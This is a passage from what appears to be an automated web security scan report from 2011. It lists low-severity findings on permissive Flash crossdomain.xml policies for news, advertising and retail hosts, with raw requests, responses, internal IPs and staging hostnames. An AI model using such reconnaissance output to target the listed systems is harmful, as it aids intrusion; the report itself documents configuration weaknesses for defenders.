/> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: i.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT ETag: "0f8ee1317e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:46 GMT Content-Length: 1558 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://images.scanalert |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: images.scanalert.com |
HTTP/1.0 200 OK Server: McAfeeSecure ETag: "EKdW2Rg2Poz" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/xml; charset=utf-8 Content-Length: 116 Date: Mon, 16 May 2011 01:39:43 GMT Connection: close Cache-Control: private <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.scanalert.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://imawow.weather.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: imawow.weather.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:59 GMT Server: Apache SVRNAME: web1x11 Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2057 Keep-Alive: timeout=1, max=7387 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.weather.com" /> <allow-access-from domain="*.epicmashup.com" /> <allow-access-from domain="showcase.weather.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.imwx.com" /> <allow-access-from domain="*.rga.com" /> <allow-access-from domain="*.jnj.com" /> <allow-access-from domain="*.zyrtec.com" /> <allow-access-from domain="*.amazonaws.com" /> <allow-access-from domain="*.gigyahosting.com" /> <allow-access-from domain="*.gigyahosting1.com" /> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="www.pointroll.com" /> <allow-access-from domain="data.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="mirror.pointroll.com" /> <allow-access-from domain="adportal.pointroll.com" /> <allow-access-from domain="*.ge.com" /> <allow-access-from domain="*.inbcu.com" /> <allow-access-from domain="widgets.nbcuni.com" /> <allow-access-from domain="*.ivillage.com" /> <allow-access-from domain="devworks.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="www.ivillage.com" /> <allow-access-from domain="msnbcmedia.msn.com" /> <allow-access-from domain="*.tvpdigital.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="apps.eyewonderlabs.com" /> <allow-access-from domain="*.eyewonder.com" /> <allow-access-from domain="fjpecvaa.joyent.us" /> <allow-access-from domain="widget.bravotv.com" /> <allow-access-from domain="*.jwtdev.com" /> <allow-access-from domain="*.jwtweb.com" /> <allow-access-from domain="*.na.jnj.com" /> <allow-access-from domain="*2mdn.net" /> <allow-access-from domain="*.googlesyndication.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: login.dotomi.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:38:30 GMT Server: Apache X-Name: dmc-o01 Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT ETag: "3500060-a1-495adbd05d700 Accept-Ranges: bytes Content-Length: 161 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://*.dotomi.com <cross-domain-policy> <allow-access-from domain="*.dotomi.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://newsrss.bbc.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: newsrss.bbc.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=120 Expires: Sun, 15 May 2011 21:21:03 GMT Date: Sun, 15 May 2011 21:19:03 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline ...[SNIP]... <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optimized-by.rubicon |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:49 GMT Server: RAS/1.3 (Unix) Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Accept-Ranges: bytes Content-Length: 223 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rubiconproject.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 11:30:02 GMT Expires: Mon, 16 May 2011 11:30:02 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 49790 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 03:47:21 GMT Expires: Mon, 16 May 2011 03:47:21 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 77543 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s7d5.scene7.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 ETag: W/"25343-1305036218000" Accept-Ranges: bytes Last-Modified: Tue, 10 May 2011 14:03:38 GMT Content-Type: application/xml Content-Length: 25343 Expires: Mon, 16 May 2011 05:25:36 GMT Date: Mon, 16 May 2011 01:35:52 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.laneventure.com"/> <allow-access-from domain="*.pearsonco.com"/> <allow-access-from domain="*.targetimg1.com"/> <allow-access-from domain="*.targetimg2.com"/> <allow-access-from domain="*.targetimg3.com"/> <allow-access-from domain="*.agilent.com"/> <allow-access-from domain="*.artvan.com"/> <allow-access-from domain="*.mizunogolf.com"/> <allow-access-from domain="*.talbots.com"/> <allow-access-from domain="giftadvisor.indelible.tv"/> <allow-access-from domain="*.taaz.com"/> <allow-access-from domain="www.flashmaxx.com"/> <allow-access-from domain="flashmaxx.com"/> <allow-access-from domain="searsfb.indelible.tv"/> <allow-access-from domain="*.armstrong.com"/> <allow-access-from domain="ag2010.stage.ascedia.com"/> <allow-access-from domain="sassomedia.com"/> <allow-access-from domain="*.photoshop.com"/> <allow-access-from domain="kijones.host.adobe.com"/> <allow-access-from domain="ag2010.stage.ascedia.com"/> <allow-access-from domain="*.trex.com"/> <allow-access-from domain="*.trexco.com"/> <allow-access-from domain="*.vermontcountrystore.com"/> <allow-access-from domain="*.pabng.com"/> <allow-access-from domain="s7sps3.scene7.com"/> <allow-access-from domain="*.morrowsnowboards.com"/> <allow-access-from domain="*.k2admin.com"/> <allow-access-from domain="*.deluxe.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.shopdeluxe.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.nimblefish.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.fossil.com"/> <allow-access-from domain="www.michele.com"/> <allow-access-from domain="127.0.0.1" secure="true"/> ...[SNIP]... <allow-access-from domain="www.polarisindustries.com"/> <allow-access-from domain="backstage.polarisind <allow-access-from domain="s7diod-isorigin.scene7 <allow-access-from domain="origin-na1.scene7.com"/> <allow-access-from domain="origin-na2.scene7.com"/> <allow-access-from domain="origin-na3.scene7.com"/> <allow-access-from domain="origin-na4.scene7.com"/> <allow-access-from domain="origin-na5.scene7.com"/> <allow-access-from domain="origin-na6.scene7.com"/> <allow-access-from domain="origin-na7.scene7.com"/> <allow-access-from domain="origin-na8.scene7.com"/> <allow-access-from domain="s7d1.scene7.com"/> <allow-access-from domain="s7d2.scene7.com"/> <allow-access-from domain="s7d3.scene7.com"/> <allow-access-from domain="s7d4.scene7.com"/> <allow-access-from domain="s7ondemand1.scene7.com"/> <allow-access-from domain="irtex1.scene7.com"/> <allow-access-from domain="10.80.1.144"/> <allow-access-from domain="10.80.1.152"/> <allow-access-from domain="10.80.1.42"/> <allow-access-from domain="origin-apps.scene7.com"/> <allow-access-from domain="s7ondemand1-apps.scene7 <allow-access-from domain="isstaging.scene7.com"/> <allow-access-from domain="techservices.scene7.com"/> <allow-access-from domain="ecomtest1.hancockms.com"/> <allow-access-from domain="www.hancockfabrics.com"/> <allow-access-from domain="www.eddiebauer.com"/> <allow-access-from domain="dev.eddiebauer.com"/> <allow-access-from domain="qa.eddiebauer.com"/> <allow-access-from domain="testvipd1.scene7.com"/> <allow-access-from domain="testvipd2.scene7.com"/> <allow-access-from domain="testvipd3.scene7.com"/> <allow-access-from domain="testvipd4.scene7.com"/> <allow-access-from domain="s7ondemand3.scene7.com"/> <allow-access-from domain="s7ondemand7.scene7.com"/> <allow-access-from domain="s7ips1.scene7.com"/> <allow-access-from domain="s7ondemand5.scene7.com"/> <allow-access-from domain="*.sample.scene7.com"/> <allow-access-from domain="origin-search.scene7.com"/> <allow-access-from domain="staging.scene7.com"/> <allow-access-from domain="s7testis.adobe.com"/> <allow-access-from domain="sportstown.crosscomm.net"/> <allow-access-from domain="sportstown.com"/> <allow-access-from domain="*.sportstown.com"/> <allow-access-from domain="www.anthropologie.com"/> <allow-access-from domain="staging.anthropologie.us"/> <allow-access-from domain="smartwool.dev.summit <allow-access-from domain="smartwool.stage <allow-access-from domain="www.smartwool.com"/> ...[SNIP]... <allow-access-from domain="testvipd5.scene7.com"/> <allow-access-from domain="www.roadrunnersports.com"/> <allow-access-from domain="dev.atgnow.com"/> <allow-access-from domain="staging.roadrunnersports <allow-access-from domain="*.sportstown.com" secure="true"/> ...[SNIP]... <allow-access-from domain="sportstown.com" secure="true"/> ...[SNIP]... <allow-access-from domain=" s7.sears.com "/> <allow-access-from domain="*.myctmh.com"/> <allow-access-from domain="*.burton.com"/> <allow-access-from domain="*.instrum3nt.com"/> <allow-access-from domain="*.tommybahama.com"/> <allow-access-from domain="demo.ml.nurun.com"/> <allow-access-from domain="trek07.hansondodge.com"/> <allow-access-from domain="*.dexdealer.com" /> <allow-access-from domain="*.bontrager.com" /> <allow-access-from domain="*.trekbikes.com" /> <allow-access-from domain="*.readyfortheroadahead <allow-access-from domain="*.belk.com"/> <allow-access-from domain="*.sears.com"/> <allow-access-from domain="*.dayport.com"/> <allow-access-from domain="eaqa2prod1234.ethanallen <allow-access-from domain="devaws.ethanallen.com"/> <allow-access-from domain="elm.kharv.com"/> <allow-access-from domain="serotoninsoftware.com"/> <allow-access-from domain="*.ethanallen.com"/> <allow-access-from domain="*.wishbook.com"/> <allow-access-from domain="*.entriq.net"/> <allow-access-from domain="test-web1-www.lbiatlanta <allow-access-from domain="*.newellco.com"/> <allow-access-from domain="preview.graco.com"/> <allow-access-from domain="*.gracobaby.com"/> <allow-access-from domain="s.sears.com"/> <allow-access-from domain="202.44.56.2"/> <allow-access-from domain="202.44.58.2"/> <allow-access-from domain="beta.graco.com"/> <allow-access-from domain="*.burton.com"/> <allow-access-from domain="*.ashleyfurniture.com" /> <allow-access-from domain="*.ashleyfurniturehom <allow-access-from domain="s7sps1-staging.scene7.com" /> <allow-access-from domain="s7sps1.scene7.com" /> <allow-access-from domain="*.lokion.com"/> <allow-access-from domain="*.vikingrange.com"/> <allow-access-from domain="www.armstrong.com"/> <allow-access-from domain="*.classscene.com"/> <allow-access-from domain="*.classsceneqa.com"/> <allow-access-from domain="*.classscenedemo.com"/> <allow-access-from domain="*.fulltiltboots.com"/> <allow-access-from domain="*.ridesnowboards.com"/> <allow-access-from domain="*.karhuskico.com"/> <allow-access-from domain="*.k2women.com"/> <allow-access-from domain="*.k2snowboarding.com"/> <allow-access-from domain="*.k2skis.com"/> <allow-access-from domain="*.ridesnowboards.com"/> <allow-access-from domain="*.lineskis.com"/> <allow-access-from domain="*.5150snowboarding.com"/> <allow-access-from domain="*.morrowsnowboards.com"/> <allow-access-from domain="*.atlassnowshoe.com"/> <allow-access-from domain="*.tubbssnowshoes.com"/> <allow-access-from domain="*.k2telemark.com"/> <allow-access-from domain="*.k2dealertools.com"/> <allow-access-from domain="*.planet-earth-clothing <allow-access-from domain="*.k2skates.com"/> <allow-access-from domain="*.k2iceskates.com"/> <allow-access-from domain="*.snowshoes.com"/> <allow-access-from domain="*.vashonstorefront.com"/> <allow-access-from domain="*.adiofootwear.com"/> <allow-access-from domain="*.adio.com"/> <allow-access-from domain="4.59.112.138"/> <allow-access-from domain="store.americangirl.com"/> <allow-access-from domain="*.store.americangirl.com"/> <allow-access-from domain="agpmt-prod:7778"/> <allow-access-from domain="agpmt-test:7777"/> <allow-access-from domain="s7demo.host.adobe.com"/> <allow-access-from domain="*.jcpenney.com"/> <allow-access-from domain="*.teamzonesports.com"/> <allow-access-from domain="*.underarmour.com"/> <allow-access-from domain="broadridge.mominc.com"/> <allow-access-from domain="*.craftsman.com"/> <allow-access-from domain="*.sothebys.com"/> <allow-access-from domain="*.facebook.com"/> <allow-access-from domain="*.thuzi.com"/> <allow-access-from domain="*.samsclub.com"/> <allow-access-from domain="161.169.79.10"/> <allow-access-from domain="store.americangirl.com"/> <allow-access-from domain="*.hansondodge.com"/> <allow-access-from domain="*.thebrick.com"/> <allow-access-from domain="s7demo.scene7.com"/> <allow-access-from domain="*.richrelevance.com"/> <allow-access-from domain="*.hit.homedepot.resource <allow-access-from domain="*.allurent.net"/> <allow-access-from domain="*.ashro.com"/> <allow-access-from domain="*.countrydoor.com"/> <allow-access-from domain="*.ginnys.com"/> <allow-access-from domain="*.grandpointe.com"/> <allow-access-from domain="*.monroeandmain.com"/> <allow-access-from domain="*.midnightvelvet.com"/> <allow-access-from domain="*.raceteamgear.com"/> <allow-access-from domain="*.swisscolony.com"/> <allow-access-from domain="*.seventhavenue.com"/> <allow-access-from domain="*.homevisions.com"/> <allow-access-from domain="*.wards.com"/> <allow-access-from domain="*.tenderfilet.com"/> <allow-access-from domain="assets.k2sports.com"/> <allow-access-from domain="assets.ridesnowboards.com"/> <allow-access-from domain="assets1.k2sports.com"/> <allow-access-from domain="assets1.ridesnowboards <allow-access-from domain="assets2.k2sports.com"/> <allow-access-from domain="assets2.ridesnowboards <allow-access-from domain="161.211.2.28"/> <allow-access-from domain="161.211.155.7"/> <allow-access-from domain="ah-stg.fry.com"/> <allow-access-from domain="cd-stg.fry.com"/> <allow-access-from domain="gn-stg.fry.com"/> <allow-access-from domain="gp-stg.fry.com"/> <allow-access-from domain="hv-stg.fry.com"/> <allow-access-from domain="mm-stg.fry.com"/> <allow-access-from domain="mv-stg.fry.com"/> <allow-access-from domain="mw-stg.fry.com"/> <allow-access-from domain="rt-stg.fry.com"/> <allow-access-from domain="rc-stg.fry.com"/> <allow-access-from domain="tf-stg.fry.com"/> <allow-access-from domain="sc-stg.fry.com"/> <allow-access-from domain="sa-stg.fry.com"/> <allow-access-from domain="shopdeluxe-v9-dev.deluxe ...[SNIP]... <allow-access-from domain="shopdeluxe-v9-uat.deluxe ...[SNIP]... <allow-access-from domain="stage.coach.com"/> <allow-access-from domain="*.coach.com"/> <allow-access-from domain="demandware.edgesuite.net"/> <allow-access-from domain="*.buildabear.com"/> <allow-access-from domain="*.babwtest.com"/> <allow-access-from domain="customshop.mesfire.com"/> <allow-access-from domain="stage.homeinspiration <allow-access-from domain="homeinspiration.homedepot <allow-access-from domain="pointroll.com"/> <allow-access-from domain="*.pointroll.com"/> <allow-access-from domain="*.smartwool.com"/> <allow-access-from domain="*.summitprojects.com"/> <allow-access-from domain="*.nike.com"/> <allow-access-from domain="511.niteviewtech.com"/> <allow-access-from domain="www.lauramercier.com"/> <allow-access-from domain="*.lumberliquidators.com"/> <allow-access-from domain="*.ae.com"/> <allow-access-from domain="*.aezone.com"/> <allow-access-from domain="s7everest.macromedia.com"/> <allow-access-from domain="s7fuji.macromedia.com"/> <allow-access-from domain="s7qa-is.macromedia.com"/> <allow-access-from domain="officemax.companyche <allow-access-from domain="www.511deasbf.com"/> <allow-access-from domain="*.511deasbf.com"/> <allow-access-from domain="*.vcfcorp.com"/> ...[SNIP]... <allow-access-from domain="*.asfurniture.com"/> <allow-access-from domain="*.vcf.com"/> ...[SNIP]... <allow-access-from domain="anthropologie.uat.venda <allow-access-from domain="anthropologie.live.venda <allow-access-from domain="*.511academy.com"/> <allow-access-from domain="*.reedkrakoff.com"/> <allow-access-from domain="stage.wearport.com"/> <allow-access-from domain="*.macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.anthropologie.eu"/> <allow-access-from domain="s7demo.host.adobe.com"/> <allow-access-from domain="www.leadbased.com"/> <allow-access-from domain="*.mxbi.com"/> <allow-access-from domain="*.jordans.com"/> <allow-access-from domain="jordans.com"/> <allow-access-from domain="jordansqa.weymouthdesign <allow-access-from domain="*.mercury.com"/> <allow-access-from domain="*.cb2.com"/> <allow-access-from domain="*.landofnod.com"/> <allow-access-from domain="*.crateandbarrel.com"/> <allow-access-from domain="*.crateandbarrel.ca"/> <allow-access-from domain="cim-dev.deluxe.com"/> <allow-access-from domain="cim-qa.deluxe.com"/> <allow-access-from domain="www.deluxe-check-order <allow-access-from domain="wwwpreprod.deluxe-check <allow-access-from domain="*.vfimagewear.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.zumiez.com"/> <allow-access-from domain="zumiez.com"/> <allow-access-from domain="*.vfc.com" secure="false"/> ...[SNIP]... <allow-access-from domain="service-apps.scene7.com"/> <allow-access-from domain="service-apps-staging <allow-access-from domain="walmart.scene7.com"/> <allow-access-from domain="s7ondemand1-apps-staging <allow-access-from domain="63.241.188.118"/> <allow-access-from domain="63.241.188.119"/> <allow-access-from domain="63.241.188.116"/> <allow-access-from domain="63.241.188.120"/> <allow-access-from domain="63.241.188.121"/> <allow-access-from domain="63.241.188.117"/> <allow-access-from domain="63.241.188.122"/> <allow-access-from domain="63.241.188.123"/> <allow-access-from domain="63.241.188.124"/> <allow-access-from domain="63.241.188.125"/> <allow-access-from domain="stage.store.americangirl <allow-access-from domain="*.kohls.com" secure="true"/> ...[SNIP]... <allow-access-from domain="media.kohls.com.edgesuite ...[SNIP]... <allow-access-from domain="*.edgeboss.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.kohlscorporation.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.kohlscareers.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.kohlsoncampus.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.apiservice.net" secure="true"/> ...[SNIP]... <allow-access-from domain="98.129.79.154" secure="true"/> ...[SNIP]... <allow-access-from domain="www.factory515.com" secure="true"/> ...[SNIP]... <allow-access-from domain="httpCDN.factory515.com" secure="true"/> ...[SNIP]... <allow-access-from domain="rtmpCDN.factory515.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mixercast.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.fluid.com"/> <allow-access-from domain="*.enlighten.com"/> <allow-access-from domain="*.hunterdouglas.com"/> <allow-access-from domain=".allurent.net" secure="true"/> ...[SNIP]... <allow-access-from domain="64.52.70.13"/> <allow-access-from domain="64.52.70.30"/> <allow-access-from domain="64.52.70.33"/> <allow-access-from domain="64.52.70.60"/> <allow-access-from domain="76.12.61.174"/> <allow-access-from domain="*.kmart.com"/> <allow-access-from domain="skavamp.com"/> <allow-access-from domain="*.skavamp.com"/> <allow-access-from domain="*.cloudfront.net"/> <allow-access-from domain="www.grandinroad.com"/> <allow-access-from domain="www.frontgate.com"/> <allow-access-from domain="97.65.222.116"/> <allow-access-from domain="97.65.222.115"/> <allow-access-from domain="*.neptune.com"/> <allow-access-from domain="*.colehaan.com"/> <allow-access-from domain="*.web.rga.com"/> <allow-access-from domain="*.ny.rga.com"/> <allow-access-from domain="content01.nimblefish.com"/> <allow-access-from domain="cdn.nimblefish.com"/> <allow-access-from domain="media.nimblefish.com"/> <allow-access-from domain="nv.nimblefish.com"/> <allow-access-from domain="app.nimblefish.com"/> <allow-access-from domain="media.beta01.nimblefish <allow-access-from domain="nv.beta01.nimblefish.com"/> <allow-access-from domain="app.beta01.nimblefish.com"/> <allow-access-from domain="media.content01 <allow-access-from domain="nv.content01.nimblefish <allow-access-from domain="app.content01.nimblefish <allow-access-from domain="*.511fbileeda.com"/> <allow-access-from domain="*.criticalmass.com"/> <allow-access-from domain="*.theodorealexander.com"/> 